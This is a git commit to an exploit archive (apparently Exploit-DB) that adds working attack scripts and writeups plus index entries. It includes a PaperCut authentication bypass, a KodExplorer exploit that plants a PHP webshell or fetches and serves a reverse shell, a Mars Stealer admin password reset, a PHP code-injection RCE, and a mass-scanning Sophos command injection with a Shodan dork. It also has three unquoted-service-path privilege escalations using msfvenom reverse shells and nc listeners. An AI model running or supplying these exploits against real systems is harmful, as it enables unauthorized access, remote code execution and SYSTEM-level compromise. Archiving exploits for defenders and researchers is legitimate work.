DB: 2023-04-26

11 changes to exploits/shellcodes/ghdb PaperCut NG/MG 22.0.4 - Authentication Bypass KodExplorer 4.49 - CSRF to Arbitrary File Upload Mars Stealer 8.3 - Admin Account Takeover Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution Sophos Web Appliance 4.3.10.4 - Pre-auth command injection Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path OCS Inventory NG 2.3.0.0 - Unquoted Service Path Wondershare Filmora 12.2.9.2233 - Unquoted Service Path Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode
2023-04-26 00:16:27 +00:00 · 2023-04-26 00:16:27 +00:00 · 7e3a257da8
commit 7e3a257da8
parent 673c08ece5
11 changed files with 699 additions and 0 deletions
--- a/exploits/multiple/webapps/51391.py
+++ b/exploits/multiple/webapps/51391.py
@ -0,0 +1,40 @@
 # Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
 # Date: 21 April 2023
 # Exploit Author: MaanVader
 # Vendor Homepage: https://www.papercut.com/
 # Version: 8.0 or later
 # Tested on: 22.0.4
 # CVE: CVE-2023-27350
 import requests
 from bs4 import BeautifulSoup
 import re
 def vuln_version():
    ip = input("Enter the ip address: ")
    url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    text_div = soup.find('div', class_='text')
    product_span = text_div.find('span', class_='product')
    # Search for the first span element containing a version number
    version_span = None
    for span in text_div.find_all('span'):
        version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
        if version_match:
            version_span = span
            break
    if version_span is None:
        print('Not Vulnerable')
    else:
        version_str = version_span.text.strip()
        print('Version:', version_str)
        print("Vulnerable version")
        print(f"Step 1 visit this url first in your browser: {url}")
        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")
 if __name__ =="__main__":
    vuln_version()
--- a/exploits/php/webapps/51388.py
+++ b/exploits/php/webapps/51388.py
@ -0,0 +1,122 @@
 # Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
 # Date: 21/04/2023
 # Exploit Author: MrEmpy
 # Software Link: https://github.com/kalcaddle/KodExplorer
 # Version: <= 4.49
 # Tested on: Linux
 # CVE ID: CVE-2022-4944
 # References:
 # * https://vuldb.com/?id.227000
 # * https://www.cve.org/CVERecord?id=CVE-2022-4944
 # * https://github.com/MrEmpy/CVE-2022-4944
 import argparse
 import http.server
 import socketserver
 import os
 import threading
 import requests
 from time import sleep
 def banner():
    print('''
 _   _____________ _____           _                      ______  _____
 _____
 | | / /  _  |  _  \  ___|         | |                     | ___ \/  __ \|
 ___|
 | |/ /| | | | | | | |____  ___ __ | | ___  _ __ ___ _ __  | |_/ /| /  \/|
 |__
 |    \| | | | | | |  __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| |    / | |    |
 __|
 | |\  \ \_/ / |/ /| |___>  <| |_) | | (_) | | |  __/ |    | |\ \ | \__/\|
 |___
 \_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_|  \___|_|    \_| \_|
 \____/\____/
                            | |
                            |_|
                [KODExplorer <= v4.49 Remote Code Executon]
                           [Coded by MrEmpy]
 ''')
 def httpd():
    port = 8080
    httpddir = os.path.join(os.path.dirname(__file__), 'http')
    os.chdir(httpddir)
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(('', port), Handler)
    print('[+] HTTP Server started')
    httpd.serve_forever()
 def webshell(url, lhost):
    payload = '<pre><?php system($_GET["cmd"])?></pre>'
    path = '/data/User/admin/home/'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(payload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target:
 {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
 {lhost}:8080/shell.php&uuid=&time=')
    print(f'[+] After the victim opens the URI, his shell will be hosted at
 {url}/data/User/admin/home/shell.php?cmd=whoami')
 def reverseshell(url, lhost):
    rvpayload = '
 https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
 '
    path = '/data/User/admin/home/'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    lport = input('[*] Your local port: ')
    reqpayload = requests.get(rvpayload).text
    reqpayload = reqpayload.replace('127.0.0.1', lhost)
    reqpayload = reqpayload.replace('1234', lport)
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(reqpayload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target:
 {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
 {lhost}:8080/shell.php&uuid=&time=')
    input(f'[*] Run the command "nc -lnvp {lport}" to receive the
 connection and press any key\n')
    while True:
        hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
        sleep(1)
        if not hitshell.status_code == 200:
            continue
        else:
            print('[+] Shell sent and executed!')
            break
 def main(url, lhost, mode):
    banner()
    if mode == 'webshell':
        webshell(url, lhost)
    elif mode == 'reverse':
        reverseshell(url, lhost)
    else:
        print('[-] There is no such mode. Use webshell or reverse')
 if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--url', action='store', help='target url',
 dest='url', required=True)
    parser.add_argument('-lh','--local-host', action='store', help='local
 host', dest='lhost', required=True)
    parser.add_argument('-m','--mode', action='store', help='mode
 (webshell, reverse)', dest='mode', required=True)
    arguments = parser.parse_args()
    main(arguments.url, arguments.lhost, arguments.mode)
--- a/exploits/php/webapps/51392.py
+++ b/exploits/php/webapps/51392.py
@ -0,0 +1,27 @@
 # Exploit Title: Mars Stealer 8.3 - Admin Account Takeover
 # Product: Mars Stelaer
 # Technology: PHP
 # Version: < 8.3
 # Google Dork: N/A
 # Date: 20.04.2023
 # Tested on: Linux
 # Author: Sköll - twitter.com/s_k_o_l_l
 import argparse
 import requests
 parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')
 parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')
 args = parser.parse_args()
 url = args.url.rstrip('/') + '/includes/settingsactions.php'
 headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}
 data = {"func": "savepwd", "pwd": "sköll"} #change password
 response = requests.post(url, headers=headers, data=data)
 if response.status_code == 200:
    print("Succesfull!")
    print("New Password: " + data["pwd"])
 else:
 	print("Exploit Failed!")
--- a/exploits/php/webapps/51394.py
+++ b/exploits/php/webapps/51394.py
@ -0,0 +1,28 @@
 # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)
 # Date: 4/23/2023
 # Author: Or4nG.M4n
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
 # Version: 1.0
 # Tested on: windows
 #
 # Vuln File : SystemSettings.php < here you can inject php code
 # 		if(isset($_POST['content'])){
 #			foreach($_POST['content'] as $k => $v)
 #			file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want
 #		}
 # Vuln File : home.php < here you can include and execute you're php code
 #                   <h3 class="text-center">Welcome</h3>
 #                   <hr>
 #                   <div class="welcome-content">
 #                       <?php include("welcome.html") ?> <=== include
 #                   </div>
 import requests
 url = input("Enter url :")
 postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}
 resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)
 print("[+] injection in welcome page")
 print("[+]"+url+"/?cmd=ls -al")
 print("\n")
--- a/exploits/php/webapps/51396.sh
+++ b/exploits/php/webapps/51396.sh
@ -0,0 +1,94 @@
 #!/bin/bash
 # Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
 # Exploit Author: Behnam Abasi Vanda
 # Vendor Homepage: https://www.sophos.com
 # Version:  Sophos Web Appliance older than version 4.3.10.4
 # Tested on: Ubuntu
 # CVE : CVE-2023-1671
 # Shodan Dork: title:"Sophos Web Appliance"
 # Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
 # Reference : https://vulncheck.com/blog/cve-2023-1671-analysis
 TARGET_LIST="$1"
 # =====================
 BOLD="\033[1m"
 RED="\e[1;31m"
 GREEN="\e[1;32m"
 YELLOW="\e[1;33m"
 BLUE="\e[1;34m"
 NOR="\e[0m"
 # ====================
 get_new_subdomain()
 {
 cat  MN.txt | grep 'YES' >/dev/null;ch=$?
           if [ $ch -eq 0 ];then
 		echo -e "	[+] Trying to get Subdomain $NOR"
 	   rm -rf cookie.txt
 	  sub=`curl -i -c cookie.txt -s -k -X $'GET' \
          -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
 	    $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn`
      	   echo -e "	[+]$BOLD$GREEN Subdomain : $sub $NOR"
  	   fi
 }
 check_vuln()
 {
 curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"
 req=`curl -i -s -k -b cookie.txt -X $'GET' \
    -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \
       $'http://www.dnslog.cn/getrecords.php?t=0'`
 echo "$req"  | grep 'dnslog.cn' >/dev/null;ch=$?
           if [ $ch -eq 0 ];then
           	echo "YES" > MN.txt
 		echo -e "	[+]$BOLD $RED https://$1 Vulnerable :D $NOR"
 		echo "https://$1" >> vulnerable.lst
 	        else
       		echo -e "	[-] https://$1 Not Vulnerable :| $NOR"
     		echo "NO" > MN.txt
 	   fi
 }
 echo '
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗        ██╗ ██████╗███████╗
 ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ███║██╔════╝╚════██║
 ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗    ██╔╝
 ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝ ██║██╔═══██╗  ██╔╝
 ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝       ██║╚██████╔╝  ██║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝        ╚═╝ ╚═════╝   ╚═╝
 ██████╗ ██╗   ██╗    ██████╗ ███████╗██╗  ██╗███╗   ██╗ █████╗ ███╗   ███╗       ██╗
 ██╔══██╗╚██╗ ██╔╝    ██╔══██╗██╔════╝██║  ██║████╗  ██║██╔══██╗████╗ ████║    ██╗╚██╗
 ██████╔╝ ╚████╔╝     ██████╔╝█████╗  ███████║██╔██╗ ██║███████║██╔████╔██║    ╚═╝ ██║
 ██╔══██╗  ╚██╔╝      ██╔══██╗██╔══╝  ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║    ▄█╗ ██║
 ██████╔╝   ██║       ██████╔╝███████╗██║  ██║██║ ╚████║██║  ██║██║ ╚═╝ ██║    ▀═╝██╔╝
 ╚═════╝    ╚═╝       ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     ╚═╝       ╚═╝
                                                                                        '
 if test "$#" -ne 1; then
    echo       "   ----------------------------------------------------------------"
    echo "    [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
    echo       "   ---------------------------------------------------------------"
    exit
 fi
 rm -rf cookie.txt
 echo "YES" > MN.txt
 for target in `cat $TARGET_LIST`
 do
 get_new_subdomain;
 echo "	[~] Checking $target"
 	check_vuln "$target"
 done
 rm -rf MN.txt
 rm -rf cookie.txt
--- a/exploits/windows/local/51389.txt
+++ b/exploits/windows/local/51389.txt
@ -0,0 +1,84 @@
 #####################################################################
 #                                                                   #
 #  Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path  #
 #  Date: 2023/04/21                                                 #
 #  Exploit Author: msd0pe                                           #
 #  Vendor Homepage: https://oscinventory-ng.org                     #
 #  Software Link: https://github.com/OCSInventory-NG/WindowsAgent   #
 #  My Github: https://github.com/msd0pe-1                           #
 #  Fixed in version 2.3.1.0                                         #
 #                                                                   #
 #####################################################################
 OCS Inventory NG Windows Agent:
 Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
 [1] Find the unquoted service path:
    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
    OCS Inventory Service   OCS Inventory Service   C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe   Auto
 [2] Get informations about the service:
    > sc qc "OCS Inventory Service"
    [SC] QueryServiceConfig SUCCESS
    SERVICE_NAME: OCS Inventory Service
            TYPE               : 110  WIN32_OWN_PROCESS (interactive)
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OCS Inventory Service
            DEPENDENCIES       : RpcSs
                               : EventLog
                               : Winmgmt
                               : Tcpip
            SERVICE_START_NAME : LocalSystem
 [3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
 [4] Upload the revese shell to C:\Program Files (x86)\OCS.exe
    > put OCS.exe
    > ls
    drw-rw-rw-          0  Sat Apr 22 05:20:38 2023 .
    drw-rw-rw-          0  Sat Apr 22 05:20:38 2023 ..
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Common Files
    -rw-rw-rw-        174  Sun Jul 24 08:12:38 2022 desktop.ini
    drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Internet Explorer
    drw-rw-rw-          0  Sun Jul 24 07:27:06 2022 Microsoft
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Microsoft.NET
    drw-rw-rw-          0  Sat Apr 22 04:51:20 2023 OCS Inventory Agent
    -rw-rw-rw-       7168  Sat Apr 22 05:20:38 2023 OCS.exe
    drw-rw-rw-          0  Sat Apr 22 03:24:58 2023 Windows Defender
    drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Windows Mail
    drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Windows Media Player
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows NT
    drw-rw-rw-          0  Fri Oct 28 05:25:41 2022 Windows Photo Viewer
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Portable Devices
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Sidebar
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 WindowsPowerShell
 [5] Start listener
    > nc -lvp 4444
 [6] Reboot the service/server
    > sc stop "OCS Inventory Service"
    > sc start "OCS Inventory Service"
    OR
    > shutdown /r
 [7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.
    C:\Windows\system32>whoami
    nt authority\system
--- a/exploits/windows/local/51393.txt
+++ b/exploits/windows/local/51393.txt
@ -0,0 +1,80 @@
 ##########################################################################
 #                                                                        #
 #  Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path  #
 #  Date: 2023/04/22                                                      #
 #  Exploit Author: msd0pe                                                #
 #  Vendor Homepage: https://www.arcsoft.com/                             #
 #  My Github: https://github.com/msd0pe-1                                #
 #                                                                        #
 ##########################################################################
 Arcsoft PhotoStudio:
 Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level.
 [1] Find the unquoted service path:
    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
    ArcSoft Exchange Service   ADExchange   C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe   Auto
 [2] Get informations about the service:
    > sc qc "ADExchange"
    [SC] QueryServiceConfig SUCCESS
    SERVICE_NAME: ADExchange
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : ArcSoft Exchange Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
 [3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe
 [4] Upload the reverse shell to C:\Program Files (x86)\Common.exe
    > put Commom.exe
    > ls
    drw-rw-rw-          0  Sun Apr 23 04:10:25 2023 .
    drw-rw-rw-          0  Sun Apr 23 04:10:25 2023 ..
    drw-rw-rw-          0  Sun Apr 23 03:55:37 2023 ArcSoft
    drw-rw-rw-          0  Sun Apr 23 03:55:36 2023 Common Files
    -rw-rw-rw-       7168  Sun Apr 23 04:10:25 2023 Common.exe
    -rw-rw-rw-        174  Sun Jul 24 08:12:38 2022 desktop.ini
    drw-rw-rw-          0  Sun Apr 23 03:55:36 2023 InstallShield Installation Information
    drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Internet Explorer
    drw-rw-rw-          0  Sun Jul 24 07:27:06 2022 Microsoft
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Microsoft.NET
    drw-rw-rw-          0  Sat Apr 22 05:48:20 2023 Windows Defender
    drw-rw-rw-          0  Sat Apr 22 05:46:44 2023 Windows Mail
    drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Windows Media Player
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows NT
    drw-rw-rw-          0  Fri Oct 28 05:25:41 2022 Windows Photo Viewer
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Portable Devices
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Sidebar
    drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 WindowsPowerShell
 [5] Start listener
    > nc -lvp 4444
 [6] Reboot the service/server
    > sc stop "ADExchange"
    > sc start "ADExchange"
    OR
    > shutdown /r
 [7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.
    C:\Windows\system32>whoami
    nt authority\system
--- a/exploits/windows/local/51395.txt
+++ b/exploits/windows/local/51395.txt
@ -0,0 +1,69 @@
 ############################################################################
 #                                                                          #
 #  Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path  #
 #  Date: 2023/04/23                                                        #
 #  Exploit Author: msd0pe                                                  #
 #  Vendor Homepage: https://www.wondershare.com                            #
 #  My Github: https://github.com/msd0pe-1                                  #
 #                                                                          #
 ############################################################################
 Wondershare Filmora:
 Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.
 [1] Find the unquoted service path:
    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
 Wondershare Native Push Service   NativePushService   C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe   Auto
 [2] Get informations about the service:
    > sc qc "NativePushService"
    [SC] QueryServiceConfig SUCCESS
    SERVICE_NAME: NativePushService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Wondershare Native Push Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
 [3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe
 [4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe
    > put Wondershare.exe
    > ls
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 .
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 ..
    drw-rw-rw-          0  Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
    drw-rw-rw-          0  Sun Apr 23 14:37:13 2023 Wondershare NativePush
    -rw-rw-rw-       7168  Sun Apr 23 14:51:47 2023 Wondershare.exe
    drw-rw-rw-          0  Sun Apr 23 13:52:30 2023 WSHelper
 [5] Start listener
    > nc -lvp 4444
 [6] Reboot the service/server
    > sc stop "NativePushService"
    > sc start "NativePushService"
    OR
    > shutdown /r
 [7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.
    C:\Windows\system32>whoami
    nt authority\system
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -12003,6 +12003,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@ -22061,6 +22062,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28318,exploits/php/webapps/28318.txt,"Knusperleicht Quickie - 'Quick_Path' Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php,,2006-08-01,2013-09-16,1,CVE-2006-3982;OSVDB-29077,,,,,https://www.securityfocus.com/bid/19271/info
 29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
 23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
 51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
 37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
 37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
 37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4633;OSVDB-123650,,,,http://www.exploit-db.comKoha-3.20.00.zip,
@ -22887,6 +22889,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 13927,exploits/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,webapps,php,,2010-06-17,,0,,,,,,
 26838,exploits/php/webapps/26838.txt,"MarmaraWeb E-Commerce - 'index.php?page' Cross-Site Scripting",2005-12-15,B3g0k,webapps,php,,2005-12-15,2013-07-15,1,CVE-2005-4288;OSVDB-21902,,,,,https://www.securityfocus.com/bid/15875/info
 26841,exploits/php/webapps/26841.txt,"MarmaraWeb E-Commerce - Remote File Inclusion",2005-12-15,B3g0k,webapps,php,,2005-12-15,2013-07-15,1,CVE-2005-4287;OSVDB-21903,,,,,https://www.securityfocus.com/bid/15877/info
 51392,exploits/php/webapps/51392.py,"Mars Stealer 8.3 - Admin Account Takeover",2023-04-25,Sköll,webapps,php,,2023-04-25,2023-04-25,0,,,,,,
 26899,exploits/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,webapps,php,,2005-12-19,2013-07-17,1,CVE-2005-4403;OSVDB-21831,,,,,https://www.securityfocus.com/bid/15959/info
 11329,exploits/php/webapps/11329.txt,"MASA2EL Music City 1.0 - SQL Injection",2010-02-04,alnjm33,webapps,php,,2010-02-03,,1,OSVDB-62133;CVE-2010-1047,,,,,
 32732,exploits/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,webapps,php,,2009-01-15,2014-04-08,1,OSVDB-105743,,,,,https://www.securityfocus.com/bid/33309/info
@ -23530,6 +23533,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12223,exploits/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,webapps,php,,2010-04-13,,1,,,,,,
 5630,exploits/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,webapps,php,,2008-05-14,,1,OSVDB-45336;CVE-2008-2293,,,,,
 50739,exploits/php/webapps/50739.txt,"Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
 51394,exploits/php/webapps/51394.py,"Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution",2023-04-25,Or4nG.M4N,webapps,php,,2023-04-25,2023-04-25,0,,,,,,
 4480,exploits/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,webapps,php,,2007-10-01,,1,OSVDB-39897;CVE-2007-5261;OSVDB-39896,,,,,
 5166,exploits/php/webapps/5166.html,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,webapps,php,,2008-02-19,2016-11-14,1,OSVDB-41942;CVE-2008-0911,,,,,
